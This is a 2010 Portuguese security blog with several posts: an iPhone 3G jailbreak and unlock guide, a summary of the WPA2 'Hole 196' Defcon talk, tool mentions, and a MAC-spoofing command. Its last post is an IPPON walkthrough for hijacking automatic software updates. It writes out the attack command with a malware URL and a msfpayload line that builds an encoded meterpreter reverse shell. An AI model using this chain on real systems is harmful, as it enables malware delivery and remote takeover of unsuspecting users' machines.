sexta-feira, 22 de outubro de 2010

Desbloqueando o iPhone 3G

O iPhone sem dúvida é um desejo de consumo de qualquer um, especialmente daqueles que amam tecnologia. Um dos grandes problemas é que ele vem amarrado com a operadora de onde foi adquirido e que o seu sistema é completamente restrito, permitindo que você instale apenas os aplicativos reconhecidos pela Apple, se é que eu posso assim dizer.

Foram descobertos várias falhas no sistema do iPhone permitindo assim que ele fosse desbloqueado para usar qualquer chip de operadora e que software de terceiros fossem instalados. Você já imaginou quantos programadores existem por ai? Agora você pode imaginar a quantidade de aplicativos que foram desenvolvidos para serem usados com um iPhone desbloqueado!

Existem dois procedimentos muito falado em relação à “crackear” o iPhone, um é o “jailbreakin” que é o ato de você tornar seu iPhone livre para instalar aplicativos de terceiros e o outro é o “unlock” que destrava o aparelho para que você possa usar qualquer chip de operadora.

Recentemente ganhei um iPhone da minha irmã (valeu Lú), como padrão ele vem completamente bloqueado. Vou relatar neste post de forma super resumida o que passei e como foi para jailbreaking e unlocking meu iPhone.

Com uma rápida busca pelo Google comecei a entender um pouco sobre todo esse processo, li um pouco aqui, um pouco ali, mais um pouco aqui, li, li, li e li muito. Tá bom de ler. Existem programas que fazem os dois processos (jaibreak e unlock), outros só o jailbreaking e outros só o unlocking. Como esses dois processos para serem realizados dependem da versão do sistema operacional e do firmware do modem (baseband) do iPhone, um programa que faz tanto o jailbreak quanto o unlock pode, por exemplo, ser capaz de realizar só o unlock, e isso é possível porque a versão do programa ainda não pode suportar o baseband atual do seu iPhone, que foi o meu caso.

Abaixo segue uma pequena lista dos programas mais utilizados:

- Sn0wbreeze

Para a realização de qualquer um dos processos é essencial que você tenha o firmware original e a última versão do iTunes instalado. O meu iPhone é um 3G (se você quiser saber qual é a versão do seu vá no Google e coloque o número de modelo do seu aparelho - Ajustes > Geral > Sobre > Modelo) com baseband 05.12.01 (para saber sua baseband - Ajustes > Geral > Sobre > Firmware do Modem) e versão do sistema 3.1.3 (7E18) (Ajustes > Geral > Sobre > Versão). Resumindo:

- iPhone 3G
- Firmware 3.1.3 (7E18)
- Baseband 05.12.01

Preciso dessas 3 informações para “hackear“ meu iPhone. Segue abaixo os links dos sites para você baixar os firmwares e o iTunes:

Obs: não baixe nada por enquanto, talvez você não precise, continue lendo

                http://www.ispazio.net/firmware

O meu grande problema foi a minha baseband  05.12.01 onde a maioria dos software que encontrei não poderia fazer o unlock, mas estava sendo implementado nas versões seguintes. Usei todos os softwares acima para realizar o jailbreaking, porém sem sucesso, sempre dando o erro 1600 pelo iTunes na hora re restaurar o sistema. Fui no site da Apple e fiz os procedimentos para resolver este problema e mais uma vez sem sucesso. Em alguns tutoriais que encontrei pela Internet fala que eu tinha que fazer um “downgrade” da minha baseband para 04.26.08, mas para conseguir fazer isso teria que antes realizar o jailbreaking, mas como não estava conseguindo fazer isso fiquei na mesma. Estava quase para desistir, foi então que descobrir o site http://jailbreakme.com, pronto uma luz no final do túnel.

Realizando o Jailbreanking e unlocking:

1 – Acesso o site http://jailbreakme.com pelo seu iPhone (usando rede wi-fi), vai aparecer uma mensagem perguntando se você deseja realizar o jailbreak, diga que sim. Quando você reiniciar seu iPhone ele já vai estar jailbreaked. Para saber se o seu aparelho é compatível entre no site http://jailbreak-me.info/ e preencha os campos necessários.

2 – Depois ache no iPhone o Cydia (aplicativo para instalar programas), busque pelo aplicativo Fuzzyband que é o responsável pelo “downgrade” ou ”upgrade” da baseband. Instale o programa e depois o execute. No meu caso ele fez um “upgrade” para 05.13.04.

3 – Agora vamos realizar o unlocking. Pelo Cydia busque e instale o programa ultraSn0w, assim que acabar a instalação é só reiniciar seu iPhone.
Pronto. Agora você tem um iPhone 3G com firmware 3.1.3 (7E18), baseband 05.13.04 e completamente desbloqueado (jailbreaked e unlocked).

Sites:

By Osvaldo

segunda-feira, 18 de outubro de 2010

Hole 196 - brechas de segurança no WPA2

O indiano Sohail Ahmad um expert em segurança wireless que trabalha para a AirTight, apresentou no Defcon18 - considerado um dos maiores eventos sobre segurança - o que chamou de “Hole 196”. Segundo Sohail este nome foi dado porque a idéia para descobrir e explorar esta falha de segurança veio do próprio documento de especificação da IEEE, que na página 196 descreve a incapacidade de uma das chaves de detectar determinado ataque.

 Figura tirada da apresentação do Sohail



A apresentação não trata de como ganhar acesso a uma rede sem fio que usa WPA2 por um usuário não autorizado e nem de como quebrar uma chave WPA2. Através desta descoberta Sohail mostra que é possível um usuário autorizado (autenticado) sniffar a rede e capturar dados dos outros usuários sem ser detectado por IDS/IPS da rede cabeada. A técnica explora uma vulnerabilidade na chave GTK (Group Temporal Key) que é usado para proteger os pacotes broadcast da rede.

Foram demonstrados três ataques com essa técnica:

1. Stealth ARP Poisoning
Onde o atacante injeta pacotes ARP Request falsos na rede, com isso fazendo com que a vítima pense que ele é o novo gateway da rede.

2. IP level targeted
Onde no campo “Encapsulated  Data Payload” do pacote pode ser injetado payloads maliciosos que irão atuar na camada de IP. Podemos usar isso para: port scanning, buffer overflow exploit, malware injection etc.

3. WDoS on broadcast
Com esta técnica é possível gerar um ataque DoS na rede sem fio que afetará todos os clientes da rede, com isso diminuindo drasticamente o link de cada máquina.

Sohail modificou dois open source software para implementar seu trabalho (PoC), wpa_supplicant (0.7.0) e madwifi (0.9.4).

Para realizar o ataque conhecido como MITM (man-in-the-middle) você poderá utilizar uma das várias ferramentas já conhecida pela comunidade, como: Cain & Abel, Ettercap, Delegated/DNSSpoof, SSLSniff, SSLStrip etc.

Na apresentação Sohail mostra algumas soluções esperadas para resolver este problema, onde uma das soluções seria a instalação de programas como DecaffeinatID e ARP Watcher nas máquinas cliente da rede, porém esta solução ficaria inviável em um ambiente com muitas máquinas. Porém esta solução não resolveria a brecha na implementação do GTK.

Para maiores informações acesse o site da DEFCON18 e baixe os slides:
http://www.defcon.org/html/links/dc-archives/dc-18-archive.html#Ahmad

By Osvaldo

sexta-feira, 15 de outubro de 2010

DAVIX - é um live CD para análise de dados

DAVIX, um live CD para análise de dados e visualização, traz as mais importantes ferramentas livres para processamento de dados e visualização.

O DAVIX é baseado em SLAX, com suporte de hardware para placas gráficas e placas de rede. SLAX é baseado no Slackware e segue uma abordagem modular. Assim, a imagem do SLAX pode ser facilmente personalizado para diversos fins. Ele pode até mesmo ser instalado em um pen drives.

O produto é enviado com um manual que lhe dá um início rápido para todas as ferramentas e fornece informações sobre como fazer DAVIX adequar às suas necessidades. Todas as ferramentas são acessíveis através do menu iniciar do KDE e acompanhado com links para manuais e tutoriais. Portanto, todas as informações para você começar com as ferramentas estão disponíveis a um clique de um botão.

By Osvaldo

fonte: http://code.google.com/p/davix/

quarta-feira, 13 de outubro de 2010

Software para inventário

Free inventário de hardware e software para redes Windows

http://www.lansweeper.com/

By Osvaldo

Solução contra ataque DoS

Deflate é um script bash leve projetada para auxiliar no processo de bloquear um ataque DoS. Ele utiliza o comando abaixo para criar uma lista de endereços IP conectados ao servidor, juntamente com o seu número total de conexões.

netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

Para maiores informações acesse o site: http://deflate.medialayer.com/

By Osvaldo

Trocando o endereço MAC no Linux

#ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx

wlan0 = é a placa de rede, neste caso é o adaptador sem fio
xx = é o MAC que você quer spoofar

By Osvaldo

quinta-feira, 7 de outubro de 2010

IPPON - injeta falsas respostas de atualização de softwares

Neste post vou mostrar como instalar e utilizar o IPPON, ferramenta apresentada pela primeira vez no DEFCON17, que compromete mecanismos de atualização automática usada por aplicativos. Ele simula a necessidade de atualizar o aplicativo com um novo arquivo no repositório, porém este arquivo pode ser um vírus, rootkit etc.

Primeiramente baixe a ferramenta no site oficial http://code.google.com/p/ippon-mitm/ ela vem “zipada”, utilize o comando abaixo para descompactar o pacote:

# unzip IPPON_dc17.zip

Como esta ferramenta é escrita em Python, é lógico que você precisa ter o python instalado em sua máquina, mas isso vem por padrão na maioria das distribuições Linux.
Agora vamos instalar os pacotes necessários para o funcionamento do IPPON. Primeiro vamos instalar o SCAPY com o comando abaixo:

# aptitude search python-scapy

Precisamos do servidor Ubigraph, que infelizmente não veio no repositório do Ubuntu 9.04, mas a instalação é tranqüila. Entre no site oficial do Ubigraph e baixe o pacote conforme sua distro e plataforma e em seguida o site vai te direcionar para uma pagina que mostrará como descompactar, instalar e executar o Ubigraph.

Site para download: http://www.ubietylab.net/ubigraph/content/Downloads/index.php
Redirecionado: http://ubietylab.net/ubigraph/content/Downloads/index.php

Siga os passos que esta em Redirecionado e pronto tudo esta funcionando, agora vamos ver como usar o IPPON, mas antes copie o arquivo ippon.py para dentro do diretório “examples/Python”do Ubigraph com o comando abaixo:

# cp ../ippon.py examples/Python/

Obs: este comando só vai funcionar se você executá-lo de dentro do diretório Ubigraph e levando em consideração que o mesmo esteja dentro do diretório Ippon.

Executando o ippon pela primeira vez:
# python examples/Python/ippon.py

Usage: ippon.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose bring the noise
Connectivity:
-i INTERFACE, --input-interface=INTERFACE
Interface to read packets from
-o INTERFACE, --output-interface=INTERFACE
Interface to write packets to
-l, --list-interfaces
List all available Interfaces
-w, --wireless-mode
Interface is wireless
Spicing:
-u URL, --mailicious-url=URL
Mailicious URL
Output:
-3, --3d-topology Live network topology in 3D

O arquivo targets.xml vem com o ippon, ele contém os programas alvo do ataque. Atualmente temos 3 alvos por padrão: MalwareBytes, Skype e Notepad++. Para iniciar um ataque basta executar o comando abaixo:

# ./ippon.py -i eth0 targets.xml -v -u http://linkparaomalware.com

Podemos criar um payload com o metasploit e copiar o arquivo para o nosso servidor web (http://linkparaomalware.com), assim quando o arquivo for carregado fará uma conexão reversa com o nosso metasploit. Um bom exemplo disso seria o comando abaixo no metasploit:

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP_SUA_MAQUINA LPORT=8080 8080 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o nome_do_arquivo.exe

Agora é só esperar um dos 3 programas se atualizar.

By Osvaldo